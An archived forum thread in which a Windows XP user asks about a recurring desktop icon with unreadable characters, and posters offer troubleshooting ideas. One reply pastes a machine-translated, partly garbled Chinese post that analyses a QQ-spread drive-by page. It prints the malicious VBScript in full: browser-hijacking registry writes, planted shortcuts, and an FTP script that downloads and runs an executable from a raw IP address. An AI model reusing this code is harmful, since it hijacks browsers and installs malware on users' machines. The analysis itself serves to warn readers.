PDA

View Full Version : Odd icon appears on my desktop


Khadaji
12-30-2004, 08:50 AM
From time to time, an odd shortcut will appear on my desktop (Windows XP.) The caption will usually be unreadable, but will also often have the 1/4 symbol in it. I have copied the caption to word and checked various fonts and it always seems to be unprintable characters. I have looked at the properties and the shortcut and it does not appear to be linked to any program. I have thought that it may be a hacker attack, but I have a firewall and last night the shortcut showed up twice, but the firewall did not report any intruder attempts. Anyone have any ideas what this shortcut may be or where it is coming from?

Alvis
12-30-2004, 08:55 AM
Did you take a screenshot?

lno
12-30-2004, 08:56 AM
I have thought that it may be a hacker attack, but I have a firewall and last night the shortcut showed up twice, but the firewall did not report any intruder attempts.If the firewall is already allowing someone access in a specific manner, it may not consider other instances as attacks.

Do you have a screenshot?

Khadaji
12-30-2004, 09:15 AM
No screen shot, but it will show up again in a few days, I'll grab a screen shot then.

Dewey Finn
12-30-2004, 09:45 AM
Since it's a shortcut, have you tried to right-click on it and look at Properties? What does it point to?

Alvis
12-30-2004, 09:51 AM
Since it's a shortcut, have you tried to right-click on it and look at Properties? What does it point to?

He already covered this -

I have looked at the properties and the shortcut and it does not appear to be linked to any program

Dewey Finn
12-30-2004, 09:52 AM
Sorry, must have read too quickly.

Khadaji
01-01-2005, 08:18 AM
So the icon appeared this morning. I have a screen capture of it, but no where to post it. The caption is  斣낼溧搆.

Jonathan Chance
01-01-2005, 08:28 AM
Email me the screenshot. I'll put it up on my webserver for you.

jasonh300
01-01-2005, 09:20 AM
斣낼溧搆.

I searched Google for this and it doesn't find anything, but the individual characters seem to come up with Japanese websites. It shows as Japanese characters here...you might not be seeing them as Japanese if you don't have the Japanese fonts installed. No telling what they mean because all of the results are in Japanese characters.

Khadaji
01-01-2005, 09:36 AM
Thanks Jonathan Chance, it is on its way.

Jonathan Chance
01-01-2005, 09:46 AM
OK, folks.

Observe:

http://www.wooleysark.com/OddShortCut.jpg

jasonh300
01-01-2005, 10:17 AM
Don't know about everybody else, but this is what I saw in the original post.

http://www.officeinkllc.com/japanese.jpg

Khadaji
01-01-2005, 11:12 AM
A new one has appeared. It's caption is 瘀漀爀椀琀攀 倀氀愀挀攀猀 唀瀀搀愀琀椀渀最⸀⸀⸀

Kythereia
01-01-2005, 01:22 PM
My first guess would be that you have some spyware or adware on your drive... have you done an anti-virus sweep of your computer?

jasonh300
01-01-2005, 01:27 PM
The first part of it came up in Google. It offered to traslate it from 'simple Chinese' but it didn't work.

This was the result before the translation. Maybe somebody can read Chinese? (http://www.google.com/search?num=100&hl=en&lr=lang_en&newwindow=1&safe=off&q=%E7%98%80%E6%BC%80%E7%88%80%E6%A4%80%E7%90%80%E6%94%80&btnG=Search)

Khadaji
01-01-2005, 03:50 PM
My first guess would be that you have some spyware or adware on your drive... have you done an anti-virus sweep of your computer?
I have McAfee and it runs regularly. I have Adaware and it is run regularly. I went to my firewall site and asked it to run it's scan for trojans and it reported nothing.

Scruloose
01-01-2005, 04:45 PM
Running these through an online translator, I get the following:

斣낼溧搆 = ? It will put out? ? $$ln


That was returned for Korean.

The second one (Chinese - Simplified)


瘀漀爀椀琀攀 倀氀愀挀攀猀 唀瀀搀愀琀椀渀最 = The stasis □□□□climbs □□□changes countenance □climbs
□□□□supports by the arm changes countenance □□□

From here: http://www.worldlingo.com/wl/translate

Yeah, I'd be carpet bombing my computer with anti-scumware munitions.

Scruloose
01-01-2005, 04:57 PM
Here's another free online translator I found, in case anyone's interested:

http://www.appliedlanguage.com/free_translation.shtml

Futile Gesture
01-01-2005, 06:15 PM
Doesn't look like a shortcut to me. It looks more like something is using your desktop directory to create temporary files.

This would appear as a mysterious and disappearing file on your desktop.

I'd investigate what is pointing at your desktop directory in your registry and see what your temp directories are set to.

Khadaji
01-01-2005, 07:19 PM
Both Norton and McAfee report no viruses or trojans. Both are up to date.

Futile Gesture that is an intereting idea. I'll see what I can find.

Mr. Blue Sky
01-01-2005, 07:23 PM
You say your firewall shows no intruder activity. How about outgoing activity?

I use Zone Alarm and it keeps a log of every program that attempts to connect to the 'net, even if I've told it to not allow it.

Sample_the_Dog
01-01-2005, 07:49 PM
I had a keylogger on my machine for who knows how long, which McAfee and AdAware did not catch. Keeping up with malware is a kind of arms race.

Currently, I use a combination of Ghost Surf Platinum (which did find the keylogger), HijackThis, Spybot, McAfee anti-virus and firewall, and Ad-Aware. They each catch things the others miss.

It's no longer just questionable sites getting hacked these days. Earlier this year, some major sites, including CitiBank, were compromised by hackers installing keyloggers (probably where I picked up mine).

These days, it's worth it to go pro, ihmo. All my traffic is encrypted now.

Sample_the_Dog
01-01-2005, 07:51 PM
I forgot to add, CWShredder is a must if you suspect you may have CoolWebSearch (aka CoolWWWSearch) on your machine. It's particularly nasty. Symptoms include popups and redirection.

DarrenS
01-01-2005, 09:49 PM
Another thing to try is open the file in a hex editor. This is not for the feint of heart, but a freeware one is available here (http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm). Then, open the file from where it lives on disk - probably something like C:\Documents and Settings\<your user name>\desktop\<the filename>

If it's really a shortcut, the filetype will be .lnk, so the name would be ???1/4.lnk or something similar. In any case, open the file in the hex editor and tell us what's in it.

DarrenS
01-01-2005, 10:12 PM
On reflection, from the screenshot it doesn't look like a shortcut since it lacks the little arrow (though this can be turned off by the user with things like TweakUI.) Still would be interesting to see what's in the file - please paste it here.

Khadaji
01-02-2005, 08:05 AM
Another thing to try is open the file in a hex editor. This is not for the feint of heart, but a freeware one is available here (http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm). Then, open the file from where it lives on disk - probably something like C:\Documents and Settings\<your user name>\desktop\<the filename>

If it's really a shortcut, the filetype will be .lnk, so the name would be ???1/4.lnk or something similar. In any case, open the file in the hex editor and tell us what's in it.
I have a hex editor (I'm a software developer.) It will not open the file and it says: Hex Editor cannot open directories. However, it does not show up as a directory or folder either in Explorer or at the command line.

And you and Kythereia are right, it does not seem to be a shortcut.

Scruloose
01-02-2005, 08:41 AM
The first part of it came up in Google. It offered to traslate it from 'simple Chinese' but it didn't work.

This was the result before the translation. Maybe somebody can read Chinese? (http://www.google.com/search?num=100&hl=en&lr=lang_en&newwindow=1&safe=off&q=%E7%98%80%E6%BC%80%E7%88%80%E6%A4%80%E7%90%80%E6%94%80&btnG=Search)

Here's a online translation of the page (a message board post):
Publication: 2004-10-31 15:02:53 human spirits:44 [This user main page] [Quotation reply] [Sends the news to sbyking] Lou Zhu

[ 原创 ] traces the QQ virus once more! (2004.10.31)

SbykingIn 2004-03-17 21:06:08 has written named [ 原创 ] QQ tail track! ! !The card, the address is
Http://www.Yoyou.Net/bbs/Announce/Announce.Asp?BoardID=42&ID=18610
Today accesses the net also has net friend's QQ to send in such news:

(2004-10-31 13:49:56) God's favored one
Sbyking, I 听歌.
This DJ music website real 好棒! You like the DJ music?
I like the DJ music very much. Thinks very the person or household who refuses to move and bargains for unreasonably high compensation when the land is requisitioned for a construction project.
You also listen! Hxxp://www.21ccn.Com/

The stand from under website cannot open directly in the address fence, wants to be poisoned you were casual! ! !

In here you must want above to look the website source code does not open its homepage?SbykingThe method is opens my individual homepage (sbyking to state here is not absolutely in creates propaganda for own rotten website, you if thought like this speech, I but treat unjustly)Http://spyking.8u8.Com/online/ found in this page
"Inputs the website in under to examine the source document" a such line in "above examined" front inputs the website, certainly must bring http:// oh, then clicks "examines", waited for one can be able to open a memorandum. This was this website source code, specifically as follows:

1.

< HTML>
< HEAD>
< TITLE> The handset ting picture, the color letter main terminal I love short note net sms521.Com< /TITLE>
< /HEAD>
< Iframe src=qq06.Htm width=0 height=0 frameborder=0 scrolling=NO> < /iframe>
// sbyking annotation here is the malicious code page! ! !
< Body onunload= "t8 ()" >
< Script Language= "javascript" >
< !--
Var exit=true;
Function t8 ()
{
If (exit)
Window.Open ('Http://www.Yi76.Com')
}
// -->

< /script>
< Center> < Iframe src=http://mms.Homeway.Com.Cn/newsite/index.Asp?Smsid=12190 width=800 height=1900 frameborder=0 scrolling=NO> < /iframe> < /center>

< /body>
< /HTML>


2.Then continues with the above method to examine qq06.Htm source code as follows:

< Object data=qq06i.Test> < /object>
< Object data=qq06.Test> < /object>


3.Then continues with the above method to examine qq06i.Test source code as follows:

< Html>
□□< Object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'> < /object>
□□
□□< Script LANGUAGE= "VBScript" >
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\default_page_url", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url1", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url2", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url3", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\First Home Page", "Http://21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1, "REG_DWORD"
□□wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD"
□□window.Close
□□< /script>
□□
□□< Script LANGUAGE= "VBScript" >
□□on error resume next
□□Call LongFei_AddFavorites ("[ brand-new MP3 not □□□□□□□栀 □H □H □X □□□□b □b □b □□□□□□□□` □□□□N □□□□□
□□changes countenance □□□□□□□N □` most □to climb □mourns □□supports by the arm □changes countenance stasis □N □e □to fear H to climb □Q □□□□□□□□□X □□□□□□□□□□栀 □H □H □X □□□□b □b □b □□□□□□□□` □□□□N □□□□□
□□
□□N □` □climbs □e □e □N □e □□e to climb □Q □I □□to climb □□` to climb 砀 □H □
□□changes countenance □□□□□□□N □` most □to climb □mourns □□supports by the arm □climbs □Q □fat H □N □X □□□□□to ferment □x □□□栀 □H □H □X □□□□b □b □b □□□□□□□□` □□□□N □□□□□
□□
□□N □` □climbs □e □e □N □e □□e to climb □Q □I □□to climb □□` to climb 砀 □H □
□□changes countenance □□□□□□□N □` most □to climb □mourns □□supports by the arm □x □I □□□□□□□changes countenance □I □` □□栀 □□mosquito larvae □□e □□□□□□□□□□□□~ □□□栀 □H □H □X □□□□b □b □b □□□□□□□□` □□□□N □□□□□
□□changes countenance □□□□□□□N □` most □to climb □mourns □□supports by the arm □changes countenance stasis □N □e □to fear H to climb □Q □□□□V □□□? □□] ","Http://www.Yi76.Com";)
□□
□□Function LongFei_AddFavorites (N, U)
□□on error resume next
□□Set S = wsh.CreateShortcut (wsh.SpecialFolders ("Favorites") + "/" + N + ".URL")
□□S.TargetPath = U
□□S.Save ()
□□Set Sl = wsh.CreateShortcut (wsh.SpecialFolders ("Favorites") + "/link/" + N + ".URL")
□□Sl.TargetPath = U
□□Sl.Save ()
□□End Function
□□
□□Function LongFei_AddDesktop (N, U)
□□on error resume next
□□Set S = wsh.CreateShortcut (wsh.SpecialFolders ("AllUsersDesktop") + "/" + N + ".URL")
□□S.TargetPath = U
□□S.Save ()
□□End Function
□□
□□< /script>
□□< Script language= "JScript.Encode ">
□□function closeit () {
□□setTimeout ("self.Close ()",5)
□□}
□□closeit ()
□□< /script>
□□
□□
□□< /html>

4.Then continues with the above method to examine qq06.Test source code as follows:


< Html>
< Object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B> < /object>
< Script LANGUAGE= "VBScript" >
Dim fso, tf, wsh
Set fso = CreateObject ("Scripting.FileSystemObject")
Set wsh=createobject ("wscript.Shell")
Set tf = fso.CreateTextFile ("ftp.Txt ", true)
Tf.Write "open 218.6.169.139 "&chr (13) &chr (10)
Tf.Write "168" &chr (13) &chr (10)
Tf.Write "168" &chr (13) &chr (10)
Tf.Write "get 21ccn.Exe "&chr (13) &chr (10)
Tf.Write "bye"
Tf.Close
A=wsh.Run ("ftp -s:Ftp.Txt ",0, true)
B=wsh.Run ("21ccn.Exe")
Window.Close
< /script>
< Script language= "javascript" >
Function closeit () {
SetTimeout ("self.Close ()",5)
}
Closeit ()
< /script>
< /html>

Subtotal: On saw like this to the website source code, own could not be poisoned! ! ! Actually this certainly does not have what profound technology, only is a small skill! ! Sbyking shares with everybody ~ ~ ~ ~ ~ ~ ~

Well, I know that I like the DJ music. Anyway...

Make of that what you will. The highlighted area of red is where 瘀漀爀椀琀攀 was found twice.

LSLGuy
01-02-2005, 08:57 AM
Do the contents of the "file" seem familiar? I'm suspecting that something is creating a file entry in the volume MFT and allocating space, but not writing anything. So you're seeing whatever junk was leftover from the prior use of that particular cluster(s).

An alternative is a slightly fouled up MFT (assuming an NTFS formatted volume). Spurious index entries aren't unheard of. If you're on a FAT32 volume, well the odds are even higher this is the source of the problem.

I'd recommend a full backup followed by using the repair & defrag tools. You can also run chkdsk from the commmand line without the /f parameter to see if you have problems. That won't fix anything, but it'll at least tell you whether I'm barking up the right tree and whether you need to go to the hassle of a full backup & repair then defrag.

Khadaji
01-03-2005, 01:03 PM
I have a hex editor (I'm a software developer.) It will not open the file and it says: Hex Editor cannot open directories. However, it does not show up as a directory or folder either in Explorer or at the command line.
A co-worker mentioned that Hex Editor was refusing to open this due to the bad characters in the caption. His suggestion is to rename the file and try to open it. I'm not at home, but will try this tonight.

Send questions for Cecil Adams to: cecil@straightdope.com

Send comments about this website to: webmaster@straightdope.com

Terms of Use / Privacy Policy

Advertise on the Straight Dope!
(Your direct line to thousands of the smartest, hippest people on the planet, plus a few total dipsticks.)

Copyright 2018 STM Reader, LLC.